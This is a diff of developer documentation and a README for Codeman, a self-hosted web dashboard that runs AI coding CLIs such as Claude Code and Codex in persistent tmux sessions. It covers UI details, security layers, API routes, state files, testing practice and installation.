⚠️ **Skin overrides outrank plain class rules.** `styles.css` nests its skin block inside `html:not([data-skin="og"]) { … }`, so a bare `.btn-toolbar` rule in there resolves to specificity **(0,2,1)** and beats a `.btn-toolbar.btn-x` rule **(0,2,0)** in `mobile.css` regardless of load order. Toolbar-button colors set from mobile.css therefore need `!important` — that is why mobile.css leans on it so heavily. Symptom: only your `!important` properties land and everything else silently renders in generic toolbar grey.
|
||||
|
||||
**Connection-loss UI** (`computeConnectionLossUi()` in constants.js, writer `_updateConnectionLossUi()` in app.js): the service worker serves the cached app shell, so an unreachable server (phone off the tailnet, VPN down, server stopped) used to render a normal-looking empty dashboard whose only tell was the 8px header dot, which reads as "no sessions", not "no connection". Two surfaces now: a full-screen **overlay** while no server state has loaded this page load (nothing behind it is worth preserving), and a non-blocking **banner** once it has (the terminal scrollback stays readable). ⚠️ A **2.5s grace** is load-bearing: a COM deploy restarts the server and SSE is back in ~200ms, and a banner on every deploy trains the user to ignore it. `navigator.onLine === false` skips the grace, since that is never a blip. Retry re-arms SSE **and** the terminal WS (`planWsReconnect` can 'give-up', and the SSE backoff caps at 30s).
|
||||
|
||||
**Z-index layers**: subagent windows (1000), plan agents (1100), mobile/tablet fixed header (1200, `mobile.css`), modals on ≤768px (1300 — must beat the fixed header or the modal close button is buried), log viewers (2000), connection-loss overlay (2500, above the fixed header and modals), image popups (3000), local echo overlay (7).
|
||||
|
||||
**Respawn presets**: `solo-work` (3s/60min), `subagent-workflow` (45s/240min), `team-lead` (90s/480min), `ralph-todo` (8s/480min), `overnight-autonomous` (10s/480min).
|
||||
|
||||
**Keyboard shortcuts**: Escape (close), Ctrl+? (help), Ctrl+W (kill), Ctrl+Tab (next), Alt+1-9 (switch tab), Ctrl+Shift+{/} (move tab left/right), Shift+Enter (newline), Ctrl+L (clear), Ctrl+Shift+R (restore size), Ctrl+Shift+V (voice input), Ctrl/Cmd +/- (font).
|
||||
**Keyboard shortcuts**: Escape (close), Ctrl+? (shortcut overlay), Ctrl/Cmd/Alt+K (session palette), Ctrl+W (kill), Ctrl+Tab (next), Alt+[/] (prev/next tab), Alt+1-9 (switch tab), Ctrl+Shift+{/} (move tab left/right), Shift+Enter or Ctrl+Enter (newline), Ctrl+C (copy selection, else interrupt) / Ctrl+Shift+C (copy, never interrupts), Ctrl+L (clear), Ctrl+Shift+R (restore size), Ctrl+Shift+V (voice input), Ctrl/Cmd +/- (font), Shift+Wheel (local scrollback when mouse passthrough is active). Rebindable via the registry.
|
||||
|
||||
### Security
|
||||
|
||||
**Full model: [`docs/security-architecture.md`](docs/security-architecture.md)** — network binding, auth pipeline, the tunnel caveat, file-serving hardening, supply-chain, instance isolation, and recommended secure setups.
|
||||
**Full model: [`docs/security-architecture.md`](docs/security-architecture.md)** (network binding, auth pipeline, the tunnel caveat, file-serving hardening, supply-chain, instance isolation, recommended setups). **Layer-by-layer detail with the history behind each: [architecture-invariants#security-layers](docs/architecture-invariants.md#security-layers).**
|
||||
|
||||
| Layer | Details |
|
||||
|-------|---------|
|
||||
| **Auth** | Optional HTTP Basic via `CODEMAN_USERNAME` (defaults to `admin`) / `CODEMAN_PASSWORD` env vars. Active only when `CODEMAN_PASSWORD` is set (`middleware/auth.ts`) |
|
||||
| **Network bind** | Defaults to `127.0.0.1` (loopback). A non-loopback bind (`--host`/`CODEMAN_HOST`) without `CODEMAN_PASSWORD` **starts but warns loudly** (0.9.0; was fail-closed in COD-29/#107). `--allow-unauthenticated-network` / `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` acknowledges the warning. Classifier: `network-auth-policy.ts` |
|
||||
| **Host guard** | Always-on Host-header allowlist blocks DNS rebinding (RCE on the default no-auth loopback install). Allows loopback, any IP literal, the bind host, `*.ts.net`/`*.trycloudflare.com`/`*.cfargotunnel.com`, the active managed tunnel, and `CODEMAN_ALLOWED_HOSTS`. ⚠️ **Custom reverse-proxy domains are rejected** unless added via `CODEMAN_ALLOWED_HOSTS=host,.suffix`. `registerHostGuard` in `server.ts`; policy in `network-auth-policy.ts` (`buildHostPolicy`/`isAllowedRequestHost`/`isAllowedRequestOrigin`) |
|
||||
| **CSRF / Origin** | Always-on cross-site Origin guard rejects state-changing requests from foreign origins (covers self-update, session create/input, settings/tunnel toggles). **A missing Origin is allowed** so curl/CLI and Claude Code hooks keep working. The global body parser keeps `text/plain` RAW (no auto-JSON-parse, which had enabled simple-request CSRF); `/api/crash-diag` self-parses. WebSocket upgrade validates Origin+Host (anti-CSWSH) in `ws-routes.ts`. Added in `c669518` (closes 2026-06-09 review CRITICALs) |
|
||||
| **QR Auth** | Single-use 6-char tokens (60s TTL) for tunnel login. See `docs/qr-auth-plan.md` |
|
||||
| **Sessions** | 24h cookie (`codeman_session`), auto-extend, device context audit |
|
||||
| **Rate limit** | 10 failed auth/IP → 429 (15min decay). QR has separate limiter |
|
||||
| **Hook bypass** | `/api/hook-event` (and `/api/status-telemetry`, the statusLine exporter) exempt from auth (localhost-only, schema-validated). While the **managed tunnel** runs, the bypass additionally requires the per-instance `X-Codeman-Hook-Secret` header (COD-54, `config/hook-secret.ts`): hook curls cat the secret file at exec time via `$CODEMAN_HOOK_SECRET_FILE` (session env), failures rate-limit in a dedicated bucket (never lock out login). External loopback proxies (own cloudflared/`tailscale serve`) aren't detected — plain bypass still applies there. Tunnel enable also **refuses** without `CODEMAN_PASSWORD` unless `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` (COD-55) |
|
||||
| **Env vars** | `CODEMAN_MUX` (managed session), `CODEMAN_API_URL` (auto-set for hooks), `CODEMAN_ALLOWED_HOSTS` (extra Host/Origin allowlist entries for reverse proxies, comma-separated; bare `.suffix` matches subdomains) |
|
||||
| **Validation** | Zod schemas, path allowlist regex, env prefix allowlist (`CLAUDE_CODE_*`/`OPENCODE_*`/`CODEX_*`) |
|
||||
| **Headers** | CORS localhost-only, CSP, X-Frame-Options, HSTS if HTTPS |
|
||||
| Layer | The rule |
|
||||
| ----------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
|
||||
| **Auth** | Optional HTTP Basic via `CODEMAN_USERNAME` (default `admin`) / `CODEMAN_PASSWORD`. Active only when `CODEMAN_PASSWORD` is set (`middleware/auth.ts`) |
|
||||
| **Network bind** | Defaults to loopback. Non-loopback without a password starts but warns loudly. Classifier: `network-auth-policy.ts` |
|
||||
| **Host guard** | Always-on Host-header allowlist blocking DNS rebinding. ⚠️ **Custom reverse-proxy domains are rejected** unless added via `CODEMAN_ALLOWED_HOSTS=host,.suffix` |
|
||||
| **CSRF / Origin** | Always-on cross-site Origin guard on state-changing requests. **A missing Origin is allowed** so curl/CLI and hooks keep working. ⚠️ The body parser keeps `text/plain` RAW; auto-JSON-parsing it enabled simple-request CSRF |
|
||||
| **QR Auth** | Single-use 6-char tokens (60s TTL) for tunnel login. See `docs/qr-auth-plan.md` |
|
||||
| **Sessions** | 24h cookie (`codeman_session`), auto-extend, device context audit |
|
||||
| **Rate limit** | 10 failed auth/IP → 429 (15min decay). QR and hook-secret have separate buckets, so neither can lock out login |
|
||||
| **Hook bypass** | `/api/hook-event` + `/api/status-telemetry` skip Basic auth (localhost-only, schema-validated), but when auth is active the loopback bypass requires `X-Codeman-Hook-Secret` **unconditionally** (Codeman cannot detect a user's own loopback reverse proxy) |
|
||||
| **Tunnel** | Enabling a tunnel **refuses** without `CODEMAN_PASSWORD` unless exposure is acknowledged via `CODEMAN_ALLOW_UNAUTHENTICATED_NETWORK=1` or the per-request `acknowledgeUnauthTunnel:true` action field (never persisted) |
|
||||
| **Validation** | Zod schemas, Unicode-aware path allowlist regex, env prefix allowlist (`CLAUDE_CODE_*`/`OPENCODE_*`/`CODEX_*`/`GEMINI_*`/`GOOGLE_*`/`ANTIGRAVITY_*`) |
|
||||
| **Headers** | CORS localhost-only, CSP, X-Frame-Options, HSTS if HTTPS |
|
||||
|
||||
**Security-relevant env vars**: `CODEMAN_MUX` (managed session), `CODEMAN_API_URL` (auto-set for hooks), `CODEMAN_ALLOWED_HOSTS` (extra Host/Origin allowlist entries for reverse proxies; bare `.suffix` matches subdomains), `CODEMAN_DOCKER_BRIDGE_HOOKS=1` (opt-in hooks-only listener on the docker bridge gateway).
|
||||
|
||||
### SSE Event Registry
|
||||
|
||||
~120 event types in `src/web/sse-events.ts` (backend) and `SSE_EVENTS` in `constants.js` (frontend). Both must be kept in sync.
|
||||
154 event constants in `src/web/sse-events.ts` (backend) and `SSE_EVENTS` in `constants.js` (frontend). **Both must be kept in sync**, and `test/sse-registry-parity.test.ts` is the guard that pins it (currently exactly in sync, 154 = 154, no drift either direction). The backend file's `@fileoverview` carries the per-category breakdown.
|
||||
|
||||
### API Routes
|
||||
|
||||
~146 handlers across 16 route files in `src/web/routes/`: system (41, incl. self-update `check`/`status`/`POST /api/system/update`, `POST /api/system/span-displays` → spawns `scripts/span-codeman.sh`, and `GET /api/codex/status`), sessions (29), orchestrator (10), cases (9), ralph (9), plan (8), files (14, incl. attachment register + list/history + `:attachmentId/raw`/`preview`/`thumbnail` + workspace `file-preview`/`file-thumbnail`), respawn (7), mux (5), push (4), scheduled (4), teams (2), hooks (1), clipboard (1), status-telemetry (1, `POST /api/status-telemetry` ← statusLine exporter), ws (1 WebSocket). Each file has `@fileoverview` with endpoint details.
|
||||
~200 handlers across 24 route files in `src/web/routes/`: system (45), sessions (34), cases (29), files (16), orchestrator (10), ralph (9), cron (9), admin (8), plan (8), respawn (7), webviews (6 + the `/webview/:cap/*` proxy), mux (5), push (4), scheduled (4, legacy `ScheduledRun`), approvals (3), readmymind (4), me (2), teams (2), search (1), hooks (1), clipboard (1), status-telemetry (1), voice (1 + the `/ws/voice/stream` relay), ws (1 WebSocket). Each file has `@fileoverview` with endpoint details.
|
||||
|
||||
**HTTP contract** (stable since 0.9.x, see `docs/versioning-policy.md`; full envelope/status/error-code/SSE spec in `docs/api-reference.md`): responses use the `ApiResponse<T>` envelope — `{ success: true, data? }` or `{ success: false, error, errorCode }` (`src/types/api.ts`). `/api/v1/*` is a versioned alias of `/api/*` (URL rewrite in `server.ts`).
|
||||
|
||||
@@ -229,15 +331,16 @@ Frontend JS modules have `@fileoverview` with `@dependency`/`@loadorder` tags. L
|
||||
- **API endpoint**: Types in `src/types/` domain file, route in `src/web/routes/*-routes.ts`. Return the `ApiResponse` envelope (`{ success: true, data }`; errors via `createErrorResponse()` with proper status code). Validate with Zod schemas in `schemas.ts`.
|
||||
- **SSE event**: Add to `src/web/sse-events.ts` + `SSE_EVENTS` in `constants.js`, emit via `broadcast()`, handle in `app.js` (`addListener(`)
|
||||
- **Session setting**: Add to `SessionState`, include in `session.toState()`, call `persistSessionState()`
|
||||
- **App setting**: decide per-device vs synced first. Per-device keys go in the `displayKeys` set in settings-ui.js and must NOT be added to `SettingsUpdateSchema` (it is `.strict()`). ⚠️ Anything in `PUT /api/settings` that acts on a setting (the `toggleService` watcher calls) must resolve from **`merged`** (persisted + incoming), never from the raw request body: a partial PUT omits keys it doesn't intend to change, and `body.x ?? default` turns every omission into "apply the default" and silently resets live services. Pinned by `test/routes/system-routes-settings-partial-put.test.ts`.
|
||||
- **Hook event**: Add to `HookEventType`, add hook in `hooks-config.ts:generateHooksConfig()`, update `HookEventSchema`
|
||||
- **Mobile feature**: Add to relevant singleton, guard with `MobileDetection.isMobile()`
|
||||
- **Mobile feature**: Add to relevant singleton, guard with `MobileDetection.isMobile()`. New header buttons must stay off phones (`test/mobile-header-buttons-policy.test.ts`).
|
||||
- **New test**: Pick unique port (search `const PORT =`). Route tests use `app.inject()` (no port needed) — see `test/routes/_route-test-utils.ts`.
|
||||
|
||||
**Validation**: Zod v4 (different API from v3). Define schemas in `schemas.ts`, use `.parse()`/`.safeParse()`.
|
||||
|
||||
## State Files
|
||||
|
||||
All in `~/.codeman/`: `state.json` (sessions, settings, respawn), `mux-sessions.json` (tmux recovery), `settings.json` (user prefs), `push-keys.json` (VAPID), `push-subscriptions.json`, `session-lifecycle.jsonl` (audit log), `update-status.json` (self-updater progress, polled across the service restart).
|
||||
All in `~/.codeman/`: `state.json` (sessions, settings, respawn, orchestrator, cron jobs/runs), `mux-sessions.json` (tmux recovery), `settings.json` (user prefs), `push-keys.json` + `push-subscriptions.json`, `session-lifecycle.jsonl` (audit log), `update-status.json` (self-updater progress, polled across the service restart), `linked-cases.json`, `webviews.json` (saved web-tab dashboard URLs), `remote-hosts.json` + `remote-cases.json`, `docker-hosts.json` + `docker-cases.json` + `docker-exports/`, `subagent-window-states.json` + `subagent-parents.json` (subagent window layout, GET/PUT `/api/subagent-window-states`/`-parents`), `hook-secret` (per-instance), `users.json` (multi-user, mode 0600) + `admin-audit.jsonl`, `intents.json` (Read My Mind intent profiles, mode 0600), `certs/` (self-signed TLS for `--https`), `.env` (CODEMAN_USERNAME/PASSWORD fallback for the `codeman attach` CLI). Transient: `self-update-runner.sh`. Multi-user case spaces live OUTSIDE the data dir at `~/codeman-users/<username>/cases` (shared across instances like `~/codeman-cases`, override `CODEMAN_USER_SPACES_DIR`).
|
||||
|
||||
**Generated top-level dirs** (all gitignored — don't edit or commit): `dist/` (esbuild output), `out/`, `coverage/`, `test-results/`, `tmp/`, `screenshots-echo-diag/`. The committed gesture bundle (`src/web/public/gesture/gesture-codeman.js`) IS tracked, but its runtime wasm/model assets (`src/web/public/gesture/wasm/`, `*.task`) are fetched and gitignored.
|
||||
|
||||
@@ -256,11 +359,15 @@ Raw `npx vitest` skips `config/vitest.config.ts`; always use `npm test --` or pa
|
||||
|
||||
**Config**: Vitest with `globals: true`, `fileParallelism: false`. Timeout 30s, teardown 60s. `config/vitest.ci.config.ts` = same minus the browser/perf excludes — keep the two configs in sync when changing shared options.
|
||||
|
||||
**Tmux safety**: under vitest (`VITEST` env var, set automatically), `TmuxManager` no-ops ALL shell commands and becomes a pure in-memory mock — tests physically cannot create/kill/attach real tmux sessions (`IS_TEST_MODE` in `src/tmux-manager.ts`). `test/setup.ts` additionally strips `CODEMAN_PASSWORD`/`CODEMAN_USERNAME` so auth state from the running instance can't leak into tests.
|
||||
**Tmux safety**: under vitest (`VITEST` env var, set automatically), `TmuxManager` no-ops ALL shell commands and becomes a pure in-memory mock — tests physically cannot create/kill/attach real tmux sessions (`IS_TEST_MODE` in `src/tmux-manager.ts`). Every docker IO path is no-op'd the same way. `Session` is test-gated too: instead of attaching a real tmux client, it spawns a raw-mode echo PTY (`TEST_PTY_SCRIPT` in `src/session.ts`), so integration tests get a live input/output loop that echoes each byte exactly once. `test/setup.ts` gives every test file a temporary `HOME`/`USERPROFILE` (all `homedir()`-derived state, `~/.codeman` and `~/codeman-cases` included, resolves into a per-file fixture; the Playwright browser cache path is preserved), and additionally strips `CODEMAN_PASSWORD`/`CODEMAN_USERNAME` (so auth state from the running instance can't leak into tests) and `CODEMAN_GESTURE` (a shell-exported gesture flag would flip render-injection assertions). ⚠️ Raw `npx vitest` without `--config` skips `setup.ts` and with it the temp-HOME isolation.
|
||||
|
||||
**Ports**: Pick unique ports manually. Search `const PORT =` before adding new tests.
|
||||
**Ports**: Pick unique ports manually, 3150+. Search `const PORT =` before adding new tests. Never 3000 (the live instance).
|
||||
|
||||
**Respawn tests**: Use `MockSession` from `test/respawn-test-utils.ts`. **Route tests**: `app.inject({ method, url, payload })` in `test/routes/` — no live port needed. **Mobile tests**: Playwright suite in `test/mobile/` (135 device profiles). Browser-testing infra and practices: `docs/browser-testing-guide.md`.
|
||||
⚠️ **Browser tests can pass vacuously on mobile input paths.** Two traps, both hit on 2026-07-27 while fixing the phone Enter button: **(1)** driving input with `app.sendInput('…')` writes PAST the `LocalEchoOverlay`, so `pendingText` stays empty and any overlay bug is invisible — type with `page.keyboard.type()` instead; **(2)** headless Chromium reports `MobileDetection.isTouchDevice()` **false even with `hasTouch: true`**, so `_localEchoEnabled` is off and the local-echo branch never executes. Force it (`app._localEchoEnabled = true`) or the test proves nothing. Assert on real state (`app._localEchoOverlay.pendingText`, plus `tmux -L codeman capture-pane -p -t <pane>` for what actually reached the PTY), not on HTTP 200.
|
||||
|
||||
**Testing against the live instance**: prod is HTTPS-only on :3000 (`curl -sk https://localhost:3000/...`). ⚠️ `w1`/`w2`/`w3` are the user's REAL sessions — never send input to them. Create your own throwaway session (`POST /api/sessions` then `POST /api/sessions/:id/shell`; creation alone leaves `pid: null` and no pane), test against that, and `DELETE` it by exact id when done.
|
||||
|
||||
**Respawn tests**: Use `MockSession` from `test/mocks/index.ts` (defined in `test/mocks/mock-session.ts`). **Route tests**: `app.inject({ method, url, payload })` in `test/routes/` — no live port needed. **Mobile tests**: Playwright suite in `test/mobile/` (136 device profiles). Browser-testing infra and practices: `docs/browser-testing-guide.md`.
|
||||
|
||||
## Debugging
|
||||
|
||||
@@ -276,10 +383,14 @@ Mobile screenshots: `~/.codeman/screenshots/`, accessed via `GET/POST /api/scree
|
||||
|
||||
## Performance & Limits
|
||||
|
||||
Target: 20 sessions, 50 agent windows at 60fps. Limits in `src/config/`: terminal 2MB, text 1MB, messages 1000, max agents 500, max sessions 50, max SSE clients 100. Use `LRUMap` for bounded caches, `StaleExpirationMap` for TTL cleanup. Anti-flicker pipeline: `docs/terminal-anti-flicker.md`.
|
||||
Target: 20 sessions, 50 agent windows at 60fps. Limits live in `src/config/` (terminal 32MB, text 1MB, messages 1000, max agents 500, max sessions 50, max SSE clients 100), most env-overridable.
|
||||
|
||||
**Memory leaks (24+ hour sessions)**: use `CleanupManager`, clear Maps in `stop()`, guard async with `if (this.cleanup.isStopped) return`. Frontend: store handler refs, clean in `close*()`. Verify: `npm test -- test/memory-leak-prevention.test.ts`.
|
||||
Two constraints worth knowing before you touch them: the env-derived PTY buffer trim is **clamped to ≤75% of max**, because a trim ≥ max would disable `BufferAccumulator` trimming entirely and make memory unbounded; and browser xterm scrollback is a **separate hardcoded 50k** (`DEFAULT_SCROLLBACK` in constants.js), deliberately lower than tmux's 100k history because 100k per tab is a mobile-memory hazard. The settings keys `terminalScrollbackLines`/`terminalBufferMaxBytes`/`terminalBufferTrimBytes` are schema-validated but **inert**; only `tmuxHistoryLimit` is wired live. → [architecture-invariants#buffers-uploads-and-terminal-history](docs/architecture-invariants.md#buffers-uploads-and-terminal-history), `docs/terminal-anti-flicker.md`
|
||||
|
||||
**Memory leaks (24+ hour sessions)**: use `CleanupManager`, clear Maps in `stop()`, guard async with `if (this.cleanup.isStopped) return`. Frontend: store handler refs, clean in `close*()`. Use `LRUMap` for bounded caches, `StaleExpirationMap` for TTL cleanup. Verify: `npm test -- test/memory-leak-prevention.test.ts`.
|
||||
|
||||
## Scripts & Tunnel
|
||||
|
||||
Key scripts: `scripts/tmux-manager.sh` (safe tmux mgmt), `scripts/tunnel.sh start|stop|url` (tunnel). Production services: `scripts/codeman-web.service`, `scripts/codeman-tunnel.service`. **Always set `CODEMAN_PASSWORD`** before exposing via tunnel.
|
||||
**`install.sh`** (repo root, 69KB) is the public entry point: `curl -fsSL <raw url> | bash` installs Node/tmux if missing, clones to `~/.codeman/app`, builds, and offers a systemd/launchd service. The network-access prompt is 3-way: **Tailscale** (loopback bind + guided `tailscale serve --bg <port>` HTTPS setup: install/login/operator/tailnet-HTTPS-toggle, then curl-verified end-to-end), **LAN** (0.0.0.0 + password prompt), or **local-only**; it preserves the existing binding on re-runs via `read_existing_binding()`. Tailscale state is detected dynamically from `tailscale serve status --json` (no marker files); the installer must NEVER `tailscale serve reset` or touch serve mappings other than 443→Codeman's port (users have unrelated serve config). `install.sh update`, `install.sh uninstall`, and `install.sh tailscale` (retrofit Tailscale access onto an existing install) also exist; `CODEMAN_NONINTERACTIVE=1` approves system changes for automation, `CODEMAN_TAILSCALE=1` presets the Tailscale choice (never installs Tailscale non-interactively).
|
||||
|
||||
Other key scripts: `scripts/tmux-manager.sh` (safe tmux mgmt), `scripts/tunnel.sh [quick|named] start|stop|status|url` (quick = random trycloudflare URL, default; `named setup|enable` = fixed-hostname tunnel via `scripts/codeman-tunnel-named.service`; bare `start|stop|url` still means quick), `scripts/run-beta.sh` (isolated beta instance), `scripts/build-agent-image.mjs` (docker base image), `scripts/self-update.sh` (detached updater). Production services: `scripts/codeman-web.service`, `scripts/codeman-tunnel.service`. **Always set `CODEMAN_PASSWORD`** before exposing via tunnel.
|
||||
|
||||
@@ -5,7 +5,7 @@
|
||||
<h2 align="center">Mission control for AI coding agents</h2>
|
||||
|
||||
<p align="center">
|
||||
<em>Claude Code • OpenCode • Codex • Terminal - One Dashboard • Any Device</em>
|
||||
<em>Claude Code • OpenCode • Codex • Antigravity • Gemini • Terminal - One Dashboard • Any Device</em>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
@@ -13,7 +13,10 @@
|
||||
<a href="https://nodejs.org/"><img src="https://img.shields.io/badge/Node.js-22%2B-22c55e?style=flat-square&logo=node.js&logoColor=white" alt="Node.js 22+"></a>
|
||||
<a href="https://www.typescriptlang.org/"><img src="https://img.shields.io/badge/TypeScript-5.9-3b82f6?style=flat-square&logo=typescript&logoColor=white" alt="TypeScript 5.9"></a>
|
||||
<a href="https://fastify.dev/"><img src="https://img.shields.io/badge/Fastify-5.x-1e3a5f?style=flat-square&logo=fastify&logoColor=white" alt="Fastify"></a>
|
||||
<img src="https://img.shields.io/badge/Tests-2861%20total-22c55e?style=flat-square" alt="Tests">
|
||||
<a href="https://www.npmjs.com/package/aicodeman"><img src="https://img.shields.io/npm/v/aicodeman?style=flat-square&label=npm&color=22c55e" alt="npm version"></a>
|
||||
<a href="https://github.com/Ark0N/Codeman/stargazers"><img src="https://img.shields.io/github/stars/Ark0N/Codeman?style=flat-square&color=eab308" alt="GitHub stars"></a>
|
||||
<a href="https://github.com/Ark0N/Codeman/graphs/contributors"><img src="https://img.shields.io/github/contributors/Ark0N/Codeman?style=flat-square&color=3b82f6" alt="Contributors"></a>
|
||||
<a href="https://github.com/Ark0N/Codeman/commits/master"><img src="https://img.shields.io/github/commit-activity/t/Ark0N/Codeman?style=flat-square&color=1e3a5f" alt="Total commits"></a>
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
@@ -21,7 +24,33 @@
|
||||
</p>
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/subagent-demo.gif" alt="Codeman — parallel subagent visualization" width="900">
|
||||
<img src="docs/images/subagent-demo-20260724.gif" alt="Codeman — parallel subagent visualization" width="900">
|
||||
</p>
|
||||
|
||||
**Codeman** is a self-hosted mission control for AI coding agents. It spawns Claude Code, OpenCode, Codex, Antigravity, or Gemini CLI inside persistent tmux sessions, streams the real terminal to any browser, and keeps agents productive after you walk away: it re-prompts on idle, resumes when a usage limit resets, runs scheduled jobs, and shows every background agent working in real time.
|
||||
|
||||
Get started in one line (macOS & Linux, Windows via WSL):
|
||||
|
||||
```bash
|
||||
curl -fsSL https://getcodeman.com/install | bash
|
||||
```
|
||||
|
||||
```bash
|
||||
codeman web
|
||||
# Open http://localhost:3000 and start your first session
|
||||
```
|
||||
|
||||
The installer asks before every system change, and re-running the same line updates in place. Full details: [Quick Start - Installation](#quick-start---installation).
|
||||
|
||||
- **One dashboard, five CLIs** - run [Claude Code, OpenCode, Codex, Antigravity, or Gemini](#more-features) per session (plus plain shell), locally, [in Docker](#isolated-docker-sessions), or [over SSH](#remote-ssh-sessions)
|
||||
- **Truly phone-friendly** - a [touch-optimized terminal](#mobile-optimized-web-ui) with instant local echo, QR login, swipe navigation, and push notifications
|
||||
- **Runs while you sleep** - [idle detection + respawn cycling](#respawn-controller) and auto-resume when a subscription limit resets, for 24+ hour unattended runs
|
||||
- **See your agents think** - [live floating windows](#live-agent-visualization) for every subagent and teammate, with real-time transcripts
|
||||
- **Nothing gets lost** - tmux persistence across restarts and network drops, exactly-once input delivery, full-scrollback replay
|
||||
- **Self-hosted and private** - loopback-only by default, MIT licensed, no telemetry, runs entirely on your machine
|
||||
|
||||
<p align="center">
|
||||
<img src="docs/images/codeman-tour-20260724.png" alt="Codeman dashboard tour: session tabs per case, one-click Run for new agents, live plan usage in the header" width="900">
|
||||
</p>
|
||||
|
||||
---
|
||||
@@ -29,22 +58,59 @@
|
||||
## Quick Start - Installation
|
||||
|
||||
```bash
|
||||
curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash
|
||||
curl -fsSL https://getcodeman.com/install | bash
|
||||
```
|
||||
|
||||
This installs Node.js and tmux if missing, clones Codeman to `~/.codeman/app`, and builds it.
|
||||
This installs Node.js and tmux if missing, clones Codeman to `~/.codeman/app`, and builds it. A few things worth knowing:
|
||||
|
||||
You'll need at least one AI coding CLI installed — [Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), or [Codex](https://developers.openai.com/codex/cli) (any combination works). After install:
|
||||
- **It asks first.** Every system change (package installs, AI CLI download) is prompted, and a menu at the end lets you choose: run Codeman in this terminal, install it as a background service (systemd/launchd, auto-start on boot), or don't start yet. Nothing runs in the background unless you pick it.
|
||||
- **Network or local-only, your choice.** The installer asks whether the dashboard should be reachable from other devices on your network (`0.0.0.0`, the default, with a strongly recommended password prompt) or from this machine only (`127.0.0.1`, safest). Skipping the password on a network bind requires an explicit confirmation and ends with a loud warning. A bare `codeman web` started by hand still defaults to loopback.
|
||||
- **Re-run to update.** The same one-liner updates a finished install in place: local changes in `~/.codeman/app` are stashed (never discarded), and a running service is restarted and verified. If a first install was interrupted, re-running resumes the full setup instead. `install.sh update` and `install.sh uninstall` also exist.
|
||||
- **CI / headless:** without a terminal attached, steps that would change your system abort with instructions instead of running silently. Set `CODEMAN_NONINTERACTIVE=1` to approve them for automation.
|
||||
|
||||
You'll need at least one AI coding CLI installed — [Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), [Codex](https://developers.openai.com/codex/cli), [Antigravity](https://antigravity.google), or [Gemini CLI](https://github.com/google-gemini/gemini-cli) (any combination works; Gemini CLI is enterprise-only since Google's consumer cutover, and Antigravity is its successor). The installer detects whichever of the five is present; if none is found, it offers to install Claude Code or OpenCode, or you can skip and install one yourself later. After install:
|
||||
|
||||
```bash
|
||||
codeman web
|
||||
# Open http://localhost:3000 and start your first session
|
||||
```
|
||||
|
||||
**Sharing with a small team?** Start it in multi-user mode instead: each person gets their own login and workspace.
|
||||
|
||||
```bash
|
||||
codeman users add alice --admin # create the first admin account
|
||||
codeman web --multiuser # named logins + per-user case spaces
|
||||
```
|
||||
|
||||
Details in [Multi-User Mode](#multi-user-mode-opt-in) below.
|
||||
|
||||
<details>
|
||||
<summary><strong>Run as a background service</strong></summary>
|
||||
<summary><strong>Keep it running in the background</strong></summary>
|
||||
|
||||
To outlive the shell you started it in, without setting anything up:
|
||||
|
||||
```bash
|
||||
codeman web -d # detach; logs to ~/.codeman/web.log
|
||||
codeman web --status # is it up, and on which pid
|
||||
codeman web --stop # graceful SIGTERM; agents keep running in tmux
|
||||
```
|
||||
|
||||
`-d` waits until the server actually answers before reporting success, and refuses to start a second one on the same data dir (two servers sharing a tmux socket attach to each other's sessions).
|
||||
|
||||
To have it come back after a reboot, install it as a service instead. The installer's final menu does this for you (option 2); `codeman service` is the equivalent for an `npm i -g aicodeman` install:
|
||||
|
||||
```bash
|
||||
codeman service install # systemd user unit (Linux) or LaunchAgent (macOS)
|
||||
codeman service status
|
||||
codeman service uninstall
|
||||
```
|
||||
|
||||
`service install` writes the unit with your current PATH baked in, which matters more than it sounds: launchd hands a job `/usr/bin:/bin:/usr/sbin:/sbin`, so a Homebrew or nvm `node`, `tmux` or `claude` is invisible to a hand-written plist. It never copies `CODEMAN_PASSWORD` into the unit file; add that yourself if the service needs auth.
|
||||
|
||||
To write the unit by hand instead:
|
||||
|
||||
**Linux (systemd):**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/.config/systemd/user
|
||||
cat > ~/.config/systemd/user/codeman-web.service << EOF
|
||||
@@ -67,6 +133,7 @@ loginctl enable-linger $USER
|
||||
```
|
||||
|
||||
**macOS (launchd):**
|
||||
|
||||
```bash
|
||||
mkdir -p ~/Library/LaunchAgents
|
||||
cat > ~/Library/LaunchAgents/com.codeman.web.plist << EOF
|
||||
@@ -94,16 +161,18 @@ cat > ~/Library/LaunchAgents/com.codeman.web.plist << EOF
|
||||
EOF
|
||||
launchctl bootstrap gui/$(id -u) ~/Library/LaunchAgents/com.codeman.web.plist
|
||||
```
|
||||
|
||||
</details>
|
||||
|
||||
<details>
|
||||
<summary><strong>Windows (WSL)</strong></summary>
|
||||
|
||||
```powershell
|
||||
wsl bash -c "curl -fsSL https://raw.githubusercontent.com/Ark0N/Codeman/master/install.sh | bash"
|
||||
wsl bash -c "curl -fsSL https://getcodeman.com/install | bash"
|
||||
```
|
||||
|
||||
Codeman requires tmux, so Windows users need [WSL](https://learn.microsoft.com/en-us/windows/wsl/install). If you don't have WSL yet: run `wsl --install` in an admin PowerShell, reboot, open Ubuntu, then install your preferred AI coding CLI inside WSL ([Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), or [Codex](https://developers.openai.com/codex/cli)). After installing, `http://localhost:3000` is accessible from your Windows browser.
|
||||
Codeman requires tmux, so Windows users need [WSL](https://learn.microsoft.com/en-us/windows/wsl/install). If you don't have WSL yet: run `wsl --install` in an admin PowerShell, reboot, open Ubuntu, then install your preferred AI coding CLI inside WSL ([Claude Code](https://docs.anthropic.com/en/docs/claude-code), [OpenCode](https://opencode.ai), [Codex](https://developers.openai.com/codex/cli), [Antigravity](https://antigravity.google), or [Gemini CLI](https://github.com/google-gemini/gemini-cli)). After installing, `http://localhost:3000` is accessible from your Windows browser.
|
||||
|
||||
</details>
|
||||
|
||||
---
|
||||
